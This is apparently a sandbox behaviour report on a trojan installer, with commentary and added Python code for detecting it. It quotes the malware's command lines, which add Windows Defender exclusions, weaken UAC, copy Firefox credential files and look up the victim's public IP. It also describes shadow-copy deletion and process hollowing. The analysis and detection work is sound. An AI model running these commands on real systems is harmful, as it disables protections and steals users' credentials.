Analysis
max time kernel: 150s
max time network: 156s
platform: windows10-ltsc 2021_x64
resource: win10ltsc2021-20241023-en
resource tags: arch:x64, arch:x86, image:win10ltsc2021-20241023-en, locale:en-us, os:windows10-ltsc 2021-x64, system
submitted: 14-11-2024 23:57
Static task: static1
Behavioral task behavioral1: Sample Trojan.Win32.DelShad.exe, Resource win7-20240903-en
Behavioral task behavioral2: Sample Trojan.Win32.DelShad.exe, Resource win10v2004-20241007-en
Behavioral task behavioral3: Sample Trojan.Win32.DelShad.exe, Resource win10ltsc2021-20241023-en
Behavioral task behavioral4: Sample Trojan.Win32.DelShad.exe, Resource win11-20241007-en
The signatures and process tree below are from the behavioral3 run (win10ltsc2021-20241023-en), the resource named in the Analysis header; the other three runs are not shown on this page.
General
Target: Trojan.Win32.DelShad.exe
Size: 30.2MB
MD5: 52cc1d2fbc403848c18f3c95dd63d727
SHA1: 9c5067b86ffc4ab6908aea7d9adf0b82353db3af
SHA256: a9883030a711aebd2ec7faff0091135ee590a0e6ac613a963f55e43edc00c595
SHA512: 7e59c7ae07bca570ce162633cfac5817bc6f012168afa3a24def0c95fef3c3251648a560761e9d967db36b31e437dbd2ed2ac884d62d4c4ee61a808a830754a0
SSDEEP: 393216:jQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37Xq:cj8579oIIaj8579oIIaj8579oIIF
The same chunk (jQV5xOYevAex37XtjUIahEeBL) repeats three times in the SSDEEP hash, which means the file contains long runs of identical content; with a 30.2MB file that is consistent with padding used to push the sample past scanner size limits, although the report itself does not say what the padding is.
Malware Config
Signatures

Disables Windows Defender enhanced notifications
Processes:
- reg.exe: Key created \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\dIsablEEnhAncEdnOtiFiCatiOns = "1"

Weakens the UAC prompting policy
Processes:
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0"
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0"
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0"
ConsentPromptBehaviorAdmin = 0 together with PromptOnSecureDesktop = 0 lets members of Administrators elevate with no prompt at all; ConsentPromptBehaviorUser = 0 makes elevation requests from standard users fail silently instead of asking for credentials. Both remove the user-visible signal that something is asking for admin rights.

Windows security bypass (Defender extension exclusions)
Processes:
- rEg.EXE: Key created \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns
- rEg.EXE: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\EXE = "0"
- rEG.EXE: Key created \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs
- rEG.EXE: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\SCr = "0"
- rEg.EXE: Key created \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns
- rEg.EXE: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\Cmd = "0"
Excluding .exe, .scr and .cmd from scanning covers the dropped payload Windows11InstaIIation.scr, the .cmd helper script and every other dropped executable. Registry key and value names are case-insensitive, so the randomised casing in the recorded paths (and in the reg.exe image name itself) changes nothing about which keys are written; it only defeats case-sensitive string matching. Any detection written against these command lines or registry paths has to compare case-insensitively.
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.

Disables use of System Restore points 1 TTPs

Drops file in Drivers directory 1 IoCs
Processes:
- cmd.exe: File opened for modification C:\Windows\system32\drivers\etc\hosts
The file is the hosts name-resolution table, not a driver; the signature fires on the drivers\ path. The report does not show what was written to it.

Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
- Windows11InstaIIation.sCr: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- Windows11InstaIIation.sCr: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
- Trojan.Win32.DelShad.tmp: Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation
- WScript.exe: Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation
- Windows11InstaIIation.sCr: Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation

Drops startup file 1 IoCs
Processes:
- Trojan.Win32.DelShad.tmp: File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk
The shortcut name spells "Installation" with lowercase l's, as does the payload's directory Windows11InstallationAssistant; the payload file itself, Windows11InstaIIation.scr, uses two capital I's in their place, so a file-name rule written against "Installation" will not match it.

Executes dropped EXE 17 IoCs
Processes (PID, image):
4892 Trojan.Win32.DelShad.tmp; 804 Trojan.Win32.DelShad.tmp; 4760 pik.exe; 3152 rp.exe; 3596 rp.exe; 772 rp.exe; 3716 rp.exe; 4660 rp.exe; 304 rp.exe; 1944 rp.exe; 4768 rp.exe; 3780 rp.exe; 1644 rp.exe; 4848 rp.exe; 2248 rp.exe; 1276 Windows11InstaIIation.scr; 1652 Windows11InstaIIation.sCr

Modifies file permissions 1 TTPs 2 IoCs
Processes (PID, image): 1664 icacls.exe; 3424 icacls.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
No IoC rows are attached to this signature; the evidence is the series of PowerShell Copy-Item commands against the Firefox profiles in the process tree below.

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 16: ipINFO.io
ipinfo.io/ip returns the caller's public address as plain text. The host name is written in mixed case on the command line (ipINFO.io); DNS names are case-insensitive, so network rules must match case-insensitively as well.

Suspicious use of SetThreadContext 1 IoCs
Processes:
- PID 1276 Windows11InstaIIation.scr set thread context of PID 1652 (sandbox procid of the target: 188)
A process setting the thread context of a child that runs its own image is the process-hollowing pattern: spawn a copy, replace its memory, redirect its main thread. The child, PID 1652, is the instance that goes on to fingerprint the machine and copy browser data.

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by: Trojan.Win32.DelShad.tmp (x2), taskkill.exe, rp.exe (x12), cmd.exe (x3), Windows11InstaIIation.scr, curl.exe, powershell.exe, Trojan.Win32.DelShad.exe (x2), Windows11InstaIIation.sCr
This key is opened by ordinary process start-up code, which is why stock utilities such as taskkill.exe, curl.exe and cmd.exe appear in the list. On its own the signature is context, not evidence of geofencing; the Geo\Nation lookup above is the stronger indicator.
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes (PID, image): 3132 find.exe; 3128 find.exe

Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
- Windows11InstaIIation.sCr: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
- Windows11InstaIIation.sCr: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
- Windows11InstaIIation.sCr: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion
- Windows11InstaIIation.sCr: Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
- Windows11InstaIIation.sCr: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer
- Windows11InstaIIation.sCr: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
- Windows11InstaIIation.sCr: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion
Taken with the BIOS and CPU checks above, the hollowed payload reads exactly the values (BIOS version, manufacturer, product name, processor name string) that VM and sandbox fingerprinting compares against known hypervisor strings. All of these reads come from PID 1652, the hollowed copy, not from the installer stages.

Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes (PID, image): 3848 vssadmin.exe

Kills process with taskkill 1 IoCs
Processes (PID, image): 2656 taskkill.exe
Modifies data under HKEY_USERS 20 IoCs
Processes: rp.exe (four instances; the process tree attaches this signature to the /TI/ stage, PIDs 4660, 1944, 1644 and 2248)
Each instance writes the same set under \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\:
- Key created ZoneMap\ (x4)
- Set value (int) AutoDetect = "0" (x4)
- Set value (int) UNCAsIntranet = "1" (x4)
- Set value (int) ProxyBypass = "1" (x4)
- Set value (int) IntranetName = "1" (x4)
These are the default Internet zone-map values that WinINet initialises in the current user's hive on first use, so they are a side effect rather than deliberate tampering. What matters is where they land: HKU\.DEFAULT is the hive that the LocalSystem account (S-1-5-18) sees as HKCU, so the writes indicate that the /TI/ stage of rp.exe is running as SYSTEM rather than as the logged-on user.
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (PID, image, number of rows; the listing is capped at 64 rows):
804 Trojan.Win32.DelShad.tmp (x2); 1676 WMIC.exe (x4); 3152 rp.exe (x4); 772 rp.exe (x4); 3596 rp.exe (x4); 3716 rp.exe (x4); 304 rp.exe (x4); 4768 rp.exe (x4); 3780 rp.exe (x4); 4848 rp.exe (x4); 3568 WMIC.exe (x4); 3852 powershell.exe (x3); 2444 powershell.exe (x2); 2944 powershell.exe (x2); 3700 powershell.exe (x2); 4660 powershell.exe (x2); 5060 powershell.exe (x2); 3132 powershell.exe (x2); 2236 powershell.exe (x2); 944 powershell.exe (x2); 2456 powershell.exe (x2); 4160 powershell.exe (x1)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (PID, image: privileges enabled; the listing is capped at 64 rows):
- 2656 taskkill.exe: SeDebugPrivilege
- 4760 pik.exe: SeDebugPrivilege
- 1376 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
- 1676 WMIC.exe (the full set, enabled twice): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- 4420 msiexec.exe: SeSecurityPrivilege
- 3152 rp.exe: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
- 3596 rp.exe: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
- 772 rp.exe: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
- 3716 rp.exe: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
- 304 rp.exe: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege
The bare numbers are privilege LUIDs the sandbox did not resolve to names (on current Windows 33 = SeIncreaseWorkingSetPrivilege, 34 = SeTimeZonePrivilege, 35 = SeCreateSymbolicLinkPrivilege, 36 = SeDelegateSessionUserImpersonatePrivilege). WMIC.exe enabling every privilege it holds is its normal start-up behaviour and is not itself suspicious.
The rp.exe rows are the interesting ones. SeDebugPrivilege plus SeAssignPrimaryTokenPrivilege and SeIncreaseQuotaPrivilege is the set a process needs to open another process's token and start a new process under it (CreateProcessAsUser). Together with the /TI/ switch on the third rp.exe stage, the HKU\.DEFAULT writes from that stage, and the fact that the reg.exe it spawns succeeds in writing under HKLM\SOFTWARE\Microsoft\Windows Defender (a key to which administrators have only read access by default), this is consistent with rp.exe being a run-as-SYSTEM/TrustedInstaller launcher for reg.exe. The report does not show where the token is taken from.
Suspicious use of FindShellTrayWindow 1 IoCs
Processes (PID, image): 804 Trojan.Win32.DelShad.tmp

Suspicious use of SetWindowsHookEx 1 IoCs
Processes (PID, image): 1276 Windows11InstaIIation.scr

Suspicious use of WriteProcessMemory 64 IoCs
Processes (source PID and image -> target PID, sandbox procid of the target; the sandbox records each spawn two or three times and caps the listing at 64 rows):
- 2212 Trojan.Win32.DelShad.exe -> 4892 (procid 83), x3
- 4892 Trojan.Win32.DelShad.tmp -> 1396 (procid 84), x3
- 1396 Trojan.Win32.DelShad.exe -> 804 (procid 85), x3
- 804 Trojan.Win32.DelShad.tmp -> 2656 (procid 86), x3
- 804 Trojan.Win32.DelShad.tmp -> 4760 (procid 89), x2
- 1652 WScript.exe -> 2360 (procid 93), x2
- 2360 cmd.exe -> 4028, 4108, 3460, 1116, 4400, 3968, 3360, 944, 4352, 1500, 1196, 3804, 3800, 4188, 4696, 4380, 3828, 1620, 4540, 4588, 2492, 1928, 3280, 1820 (procids 95 to 118, one child each), x2 each
The parent-writes-to-new-child rows line up one to one with the process tree, so they double as parent/child edges. Two caveats: PIDs are reused within the run (1652 is WScript.exe here but Windows11InstaIIation.sCr in the process tree and in the SetThreadContext row, whose target procid is 188), so the sandbox's procid is the stable identifier and the PID is not; and the WScript.exe branch with cmd.exe 2360's 24 children does not appear in the visible part of the process tree, which is cut off below.
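The SetThreadContext and WriteProcessMemory tables above are raw event rows keyed by PID. The following Python is added here as a worked example and is not part of the sandbox report: it rebuilds the parent/child chain from rows of that shape, flags the pattern in which a process sets the thread context of a child running its own image (PID 1276 into 1652), and lists PIDs that were reused during the run. It assumes, as stated above, that a parent's WriteProcessMemory rows into a newly created child mark process creation; the EVENTS rows are constructed by hand from this report's PIDs and image names (target images taken from the process tree), not parsed from the page, and the labels are mine.

```python
"""Rebuild parent/child edges from flattened sandbox event rows and flag the
spawn-then-SetThreadContext pattern.  Added example, not part of the report.
EVENTS is constructed from PIDs and image names that appear in the report."""
from collections import defaultdict

# (kind, src_pid, src_image, dst_pid, dst_image).  The report's rows only name
# the source image; the target images here come from the process tree.
EVENTS = [
    ("WriteProcessMemory", 2212, "Trojan.Win32.DelShad.exe", 4892, "Trojan.Win32.DelShad.tmp"),
    ("WriteProcessMemory", 2212, "Trojan.Win32.DelShad.exe", 4892, "Trojan.Win32.DelShad.tmp"),  # logged twice
    ("WriteProcessMemory", 4892, "Trojan.Win32.DelShad.tmp", 1396, "Trojan.Win32.DelShad.exe"),
    ("WriteProcessMemory", 1396, "Trojan.Win32.DelShad.exe", 804, "Trojan.Win32.DelShad.tmp"),
    ("WriteProcessMemory", 804, "Trojan.Win32.DelShad.tmp", 2656, "taskkill.exe"),
    ("WriteProcessMemory", 804, "Trojan.Win32.DelShad.tmp", 4760, "pik.exe"),
    ("WriteProcessMemory", 1652, "WScript.exe", 2360, "cmd.exe"),
    ("SetThreadContext", 1276, "Windows11InstaIIation.scr", 1652, "Windows11InstaIIation.sCr"),
]


def key(pid, image):
    """Process identity for one run: PID plus case-folded image name.  PIDs are
    reused within a run (1652 is both WScript.exe and Windows11InstaIIation.sCr
    in the report), so the PID alone is ambiguous."""
    return (pid, image.lower())


def build_tree(events):
    """Parent -> ordered children.  Assumption (see lead-in): a parent's
    WriteProcessMemory into a new child is how this sandbox records creation.
    Repeated rows for the same spawn collapse to one edge."""
    tree = defaultdict(list)
    for kind, spid, simg, dpid, dimg in events:
        if kind != "WriteProcessMemory":
            continue
        parent, child = key(spid, simg), key(dpid, dimg)
        if child not in tree[parent]:
            tree[parent].append(child)
    return dict(tree)


def roots(tree):
    """Parents that are never recorded as somebody's child."""
    children = {c for kids in tree.values() for c in kids}
    return [p for p in tree if p not in children]


def render(tree, node, depth=0, out=None):
    """Indented text tree, two spaces per level."""
    out = [] if out is None else out
    out.append("  " * depth + f"{node[0]} {node[1]}")
    for child in tree.get(node, []):
        render(tree, child, depth + 1, out)
    return out


def find_thread_hijack(events):
    """SetThreadContext from a process into a child running the same image is
    the self-hollowing pattern: spawn a copy, overwrite it, redirect its thread."""
    return [(key(spid, simg), key(dpid, dimg))
            for kind, spid, simg, dpid, dimg in events
            if kind == "SetThreadContext" and simg.lower() == dimg.lower()]


def reused_pids(events):
    """PIDs that appear with more than one image name in the same run."""
    images = defaultdict(set)
    for _, spid, simg, dpid, dimg in events:
        images[spid].add(simg.lower())
        images[dpid].add(dimg.lower())
    return {pid for pid, imgs in images.items() if len(imgs) > 1}


if __name__ == "__main__":
    tree = build_tree(EVENTS)
    for root in roots(tree):
        print("\n".join(render(tree, root)))
    print("thread hijack:", find_thread_hijack(EVENTS))
    print("reused PIDs:", reused_pids(EVENTS))
```

Keying on (PID, image) is enough for this report; for a full feed, key on the sandbox's own procid column instead, which is unique per process for the run.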
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.

Views/modifies file attributes 1 TTPs 1 IoCs

cURL User-Agent 1 IoCs
Uses User-Agent string associated with cURL utility.
Processes:
- flow 17: HTTP User-Agent header curl/8.7.1
The request comes from the inbox C:\Windows\SysWOW64\curl.exe, started by the .cmd helper (CUrL -S ipINFO.io/Ip in the process tree), so the User-Agent is whatever the image's curl build sends rather than a value chosen by the malware.
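The three reg.exe tables at the top of this section, the ipinfo.io lookup and the Firefox profile copying in the process tree all share one detection problem: the sample randomises letter case everywhere, and registry paths and DNS names are case-insensitive anyway. The Python below is added as a worked example and is not the sandbox's rule set: it folds case before matching and classifies command lines into those categories. The rule names are mine; SAMPLE_CMDLINES is constructed from the process tree, with the UAC line reconstructed from the registry write the report lists (the report does not show that command line), the PowerShell line shortened to two of its five Copy-Item calls, two benign controls added, and the extra IP-lookup hosts and Chromium's "Login Data" added as generalisations beyond what this report shows.

```python
"""Case-folding classifier for reg.exe / curl / PowerShell command lines.
Added example, not the sandbox's own rules; rule names are mine."""
import re
import shlex

# Registry key prefixes (hive abbreviated, case-folded) worth alerting on.
REG_RULES = {
    r"hklm\software\microsoft\windows defender\exclusions": "defender-exclusion-added",
    r"hklm\software\microsoft\windows defender security center": "defender-notifications-tampered",
    r"hklm\software\microsoft\windows defender": "defender-setting-tampered",
    r"hklm\software\microsoft\windows\currentversion\policies\system": "uac-policy-weakened",
}
# Under Policies\System only these values weaken UAC when written as 0.
UAC_VALUES = {"consentpromptbehavioradmin", "consentpromptbehavioruser",
              "promptonsecuredesktop", "enablelua"}
# ipinfo.io is in the report; the other hosts are common equivalents (my addition).
IP_LOOKUP_HOSTS = ("ipinfo.io", "api.ipify.org", "icanhazip.com", "ifconfig.me")
# Firefox stores named in the report plus Chromium's "Login Data" (my addition).
BROWSER_STORES = re.compile(
    r"logins\.json|key[34]\.db|cert9\.db|cookies\.sqlite|formhistory\.sqlite|login data")


def _norm_key(key):
    """Case-fold a registry path; map long hive names and the kernel
    \\REGISTRY\\MACHINE form used in the report's IoC rows to hklm/hkcu/hku."""
    k = key.strip('"').casefold()
    for prefix, short in (("hkey_local_machine\\", "hklm\\"), ("\\registry\\machine\\", "hklm\\"),
                          ("hkey_current_user\\", "hkcu\\"), ("hkey_users\\", "hku\\")):
        if k.startswith(prefix):
            return short + k[len(prefix):]
    return k


def parse_reg_add(cmd):
    """(key, value_name, data) for a `reg add` command line, else None.
    shlex in non-POSIX mode keeps a quoted key containing spaces as one token
    and does not treat backslashes as escapes, which Windows paths need."""
    try:
        toks = [t.strip('"') for t in shlex.split(cmd, posix=False)]
    except ValueError:                       # unbalanced quotes: not readable as reg.exe
        return None
    low = [t.casefold() for t in toks]
    if len(low) < 3 or low[0].rsplit("\\", 1)[-1] not in ("reg", "reg.exe") or low[1] != "add":
        return None

    def opt(flag):                           # token following /v or /d, if any
        return low[low.index(flag) + 1] if flag in low[:-1] else None

    return _norm_key(toks[2]), opt("/v"), opt("/d")


def classify(cmd):
    """All findings for one command line; each is a dict with a 'rule' key."""
    findings = []
    parsed = parse_reg_add(cmd)
    if parsed:
        key, value, data = parsed
        # Longest prefix first so "...windows defender\exclusions" beats "...windows defender".
        for prefix in sorted(REG_RULES, key=len, reverse=True):
            if key.startswith(prefix):
                rule = REG_RULES[prefix]
                if rule != "uac-policy-weakened" or (value in UAC_VALUES and data == "0"):
                    findings.append({"rule": rule, "key": key, "value": value, "data": data})
                break
    low = cmd.casefold()                     # DNS names are case-insensitive too ("ipINFO.io")
    for host in IP_LOOKUP_HOSTS:
        if host in low:
            findings.append({"rule": "external-ip-lookup", "host": host})
            break
    stores = sorted(set(BROWSER_STORES.findall(low)))
    if stores and ("firefox" in low or "chrome" in low):
        findings.append({"rule": "browser-credential-store-copied", "artifacts": stores})
    return findings


def classify_all(cmdlines):
    """Index -> rule names; an empty list means the line triggered nothing."""
    return {i: [f["rule"] for f in classify(c)] for i, c in enumer_lines(cmdlines)}


def enumer_lines(cmdlines):
    return enumerate(cmdlines)


# Constructed sample: 0, 1, 3 and 4 are from the process tree (4 shortened to two
# Copy-Item calls); 2 is reconstructed from the registry write the report lists;
# 5 and 6 are benign controls.
SAMPLE_CMDLINES = [
    r'rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F',
    r'rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f',
    r'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f',
    r'CUrL -S ipINFO.io/Ip',
    r'powershell.exe "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\a.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\b.tmp\" -Force"',
    r'reg add HKCU\Software\ExampleApp /v Theme /t REG_SZ /d dark /f',
    r'curl -s https://example.com/',
]

if __name__ == "__main__":
    for i, rules in classify_all(SAMPLE_CMDLINES).items():
        print(i, rules or "clean")
```

The UAC rule deliberately fires only when one of the four prompting values is set to 0; writing EnableLUA = 1 or raising ConsentPromptBehaviorAdmin is hardening and stays quiet. Because the value data is compared as a string, a rule for REG_SZ values would need a small extension.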
Processes

The tree below is the sandbox's process list, with the recorded nesting depth in brackets, each process's command line on the line under its image path, and the signatures attached to it as bullets. Three things are worth reading off it before the individual entries:

- The is-XXXXX.tmp\Trojan.Win32.DelShad.tmp bootstrap with a /SL5= argument and the /verysilent /sp- switches are Inno Setup conventions: the sample is an Inno Setup installer that unpacks its own stub, then re-runs itself silently (depths 1 to 4).
- Children whose image path is C:\Windows\SysWOW64\... while the command line says C:\Windows\system32\... are launched by the 32-bit installer; the path is redirected by WOW64.
- PIDs are reused within the run: 304 is rp.exe at depth 6 and later cmd.exe under the second .cmd invocation, and 4660 is rp.exe and later powershell.exe. Match on PID plus image (or the sandbox's procid), never on PID alone.

[1] C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe (PID 2212)
    "C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\is-U7LE5.tmp\Trojan.Win32.DelShad.tmp (PID 4892)
      "C:\Users\Admin\AppData\Local\Temp\is-U7LE5.tmp\Trojan.Win32.DelShad.tmp" /SL5="$501BE,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe (PID 1396)
        "C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Local\Temp\is-I11FA.tmp\Trojan.Win32.DelShad.tmp (PID 804)
          "C:\Users\Admin\AppData\Local\Temp\is-I11FA.tmp\Trojan.Win32.DelShad.tmp" /SL5="$601BE,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
          - Drops startup file
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of WriteProcessMemory
          This silent second-stage installer is the process that drops the Startup shortcut and launches everything below.
        [5] C:\Windows\SysWOW64\taskkill.exe (PID 2656)
            "C:\Windows\system32\taskkill.exe" /f /im "Windows11InstaIIation.scr"
            - System Location Discovery: System Language Discovery
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
            Kills any already-running copy of the payload before it is dropped again.
        [5] C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\pik.exe (PID 4760)
            "C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\pik.exe"
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\SysWOW64\cmd.exe (PID 4260)
            "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\.cmd""
            - System Location Discovery: System Language Discovery
            The helper batch file is literally named ".cmd" (empty base name). Each of its four reg.exe writes goes through three nested rp.exe stages, the last with /TI/, before reg.exe itself runs.
          [6] C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe (PID 3152)
              rp.EXE /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe (PID 3596)
                "C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
              [8] C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe (PID 4660)
                  "C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
                  - Executes dropped EXE
                  - System Location Discovery: System Language Discovery
                  - Modifies data under HKEY_USERS
                [9] C:\Windows\system32\rEG.EXE (PID 844)
                    "C:\Windows\system32\rEG.EXE" add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
                    - Windows security bypass
          [6] C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe (PID 772)
              rP.EXE /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe (PID 3716)
                "C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
              [8] C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe (PID 1944)
